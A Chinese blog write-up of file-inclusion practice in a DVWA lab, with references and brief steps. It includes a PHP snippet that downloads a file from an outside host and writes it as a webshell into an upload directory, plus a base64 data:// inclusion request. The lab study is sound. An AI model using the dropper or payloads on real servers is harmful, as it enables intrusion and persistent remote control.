文件包含漏洞实践

参考资料:

介绍php几种协议及使用方法:https://www.cnblogs.com/iamstudy/articles/include_file.html

如何利用文件上传漏洞getshell:https://blog.csdn.net/xysoul/article/details/46689049/

介绍日志文件包含漏洞:https://www.cnblogs.com/my1e3/p/5854897.html

1、利用dvwa创建漏洞环境,允许包含URL。



2、验证存在文件包含漏洞。


3、测试远程包含文件。



4、测试写入一句话。

远程直接包含一句话,无法正常使用,需要进一步确认。

5、测试phpinput方法,成功。

解决权限问题后,就可以直接写入webshell了。



具体代码如下:

$f=file_get_contents(“http://www.xxx.cn/m4r10.txt”); //打开指定路径的文件流

$ff=fopen(“./upload/m4r10.php”,”a”); //寻找一个可以的目录,创建一个文件

fwrite ($ff,$f);  //把前面打开的文件流写到创建的文件里

fclose($ff);  //关闭保存文件

?>

6、php filter方法。

7、data方法。

GET /dvwa/vulnerabilities/fi/?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw==


8、尝试包含日志文件。

www-data用户,默认没有访问日志文件的权限,未进行此次实践。


遗留问题:

1、新版的kali,上传php一句话,菜刀无法连接,原因未知(格式不兼容?)。

2、参考链接1中,其他封装协议处,zip,phar等,不理解具体用途和使用方法。

3、apache用户为www-data,没有访问/var/log的权限,如何记录日志?

你可能感兴趣的:(文件包含漏洞实践)